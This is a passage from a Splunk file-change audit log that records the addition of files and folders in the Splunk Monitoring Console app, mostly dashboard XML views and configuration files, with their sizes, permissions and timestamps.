hash=] Audit:[timestamp=10-06-2022 17:41:55.323, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/resource_usage_cpu_instance.xml", isdir=0, size=22700, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.319, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/resource_usage_cpu_deployment.xml", isdir=0, size=33178, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.315, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/reports.xml", isdir=0, size=122, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.311, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/reports.prod_lite.xml", isdir=0, size=139, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.307, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_overview_preferences.xml", isdir=0, size=148, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.303, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_overview_preferences.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.299, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_overview.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.293, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_overview.prod_lite.xml", isdir=0, size=11147, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.289, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_overview.env_cloud.xml", isdir=0, size=20235, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.284, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_landing.xml", isdir=0, size=135, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.280, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_landing.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.276, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_instances.xml", isdir=0, size=157, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.272, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_instances.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.268, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_forwarder_setup.xml", isdir=0, size=154, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.264, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_configure.xml", isdir=0, size=158, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.259, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_configure.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.254, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_check_list.xml", isdir=0, size=146, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.250, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_check_list.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.242, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_check.xml", isdir=0, size=140, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.238, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_check.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.232, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_alerts_setup.xml", isdir=0, size=140, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.227, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/monitoringconsole_alerts_setup.prod_lite.xml", isdir=0, size=149, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.220, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/license_usage_today.xml", isdir=0, size=5384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.213, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/license_usage_today.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.209, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/license_usage_historic.xml", isdir=0, size=11014, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.204, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/license_usage_30days.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.200, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/kv_store_instance.xml", isdir=0, size=37727, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.195, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/kv_store_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.190, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/kv_store_deployment.xml", isdir=0, size=45333, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.186, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/kv_store_deployment.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.181, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexing_performance_instance.xml", isdir=0, size=12703, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.176, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexing_performance_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.172, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexing_performance_deployment.xml", isdir=0, size=25075, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.168, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexing_performance_deployment.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.164, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexing_performance_advanced.xml", isdir=0, size=23465, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.160, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexing_performance_advanced.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.154, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexes_and_volumes_instance.xml", isdir=0, size=15108, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.150, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexes_and_volumes_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.146, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexes_and_volumes_deployment.xml", isdir=0, size=11448, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.143, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexes_and_volumes_deployment.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.137, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexer_clustering_status.xml", isdir=0, size=15562, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.131, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexer_clustering_status.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.127, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexer_clustering_service_activity.xml", isdir=0, size=21138, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.123, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/indexer_clustering_service_activity.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.120, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/index_detail_instance.xml", isdir=0, size=29935, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.116, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/index_detail_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.112, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/index_detail_deployment.xml", isdir=0, size=23534, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.109, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/index_detail_deployment.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.105, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/http_event_collector_instance.xml", isdir=0, size=40772, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.101, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/http_event_collector_instance.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.098, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/http_event_collector_instance.env_cloud.xml", isdir=0, size=39619, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.094, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/http_event_collector_deployment.xml", isdir=0, size=44166, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.091, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/forwarder_overview.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.085, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/forwarder_overview.prod_lite.xml", isdir=0, size=6748, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.080, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/forwarder_instance.xml", isdir=0, size=5944, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.076, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/forwarder_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.070, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/forwarder_instance.env_cloud.xml", isdir=0, size=5162, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.066, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/forwarder_deployment.xml", isdir=0, size=13638, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.062, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/forwarder_deployment.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.057, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/forwarder_deployment.env_cloud.xml", isdir=0, size=8616, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.053, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/distributed_search_instance.xml", isdir=0, size=25562, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.049, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/distributed_search_instance.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.044, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/distributed_search_deployment.xml", isdir=0, size=29788, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.039, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/distributed_search_deployment.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.035, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/disk_usage_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.030, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/data_quality.xml", isdir=0, size=19203, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.025, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/data_quality.env_cloud.xml", isdir=0, size=17233, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.021, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/dashboards.xml", isdir=0, size=125, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.016, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/dashboards.prod_lite.xml", isdir=0, size=142, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.012, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/cascading_replication.xml", isdir=0, size=13824, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.008, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/bundle_replication.xml", isdir=0, size=19513, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.001, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/alerts.xml", isdir=0, size=121, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:54.996, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/alerts.prod_lite.xml", isdir=0, size=138, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:54.992, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/admission_control_monitoring_instance.xml", isdir=0, size=10924, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:54.986, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/admission_control_monitoring_distributed.xml", isdir=0, size=10884, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.878, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views", isdir=1, size=12288, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.874, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.871, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/manager", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.867, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.863, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/visualizations.conf", isdir=0, size=94, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.858, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/transforms.conf", isdir=0, size=301, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.853, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/splunk_monitoring_console_assets.conf", isdir=0, size=3889, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.850, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/savedsearches.conf", isdir=0, size=12301, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.846, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/props.conf", isdir=0, size=3693, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.842, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/package.json", isdir=0, size=2898, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.839, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/package-lock.json", isdir=0, size=489608, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.835, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/node.cmd", isdir=0, size=172, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.830, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/metric_rollups.conf", isdir=0, size=288, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.825, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/macros.conf", isdir=0, size=59356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.821, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/lint.js", isdir=0, size=4286, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.817, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/karma.conf.js", isdir=0, size=1451, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.813, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/inputs.conf", isdir=0, size=232, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.808, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/i18n.js", isdir=0, size=7215, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.803, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/flaky-tests.js", isdir=0, size=645, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.799, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/environment.es", isdir=0, size=699, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.795, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/dmc_alerts.conf", isdir=0, size=5751, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.791, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/distsearch.conf", isdir=0, size=124, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.787, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.783, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/ci_ui_runner_mc.js", isdir=0, size=2352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.779, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/checklist.conf", isdir=0, size=30846, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.775, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/build.js", isdir=0, size=16807, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.771, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/bootstrap-config.js", isdir=0, size=985, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.767, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/app.conf", isdir=0, size=423, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.764, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/.prettierrc", isdir=0, size=65, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.760, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/.npmrc", isdir=0, size=57, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.756, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/.jshintrc", isdir=0, size=2349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.751, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/.jshintignore", isdir=0, size=121, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.745, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/.eslintrc.js", isdir=0, size=2000, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 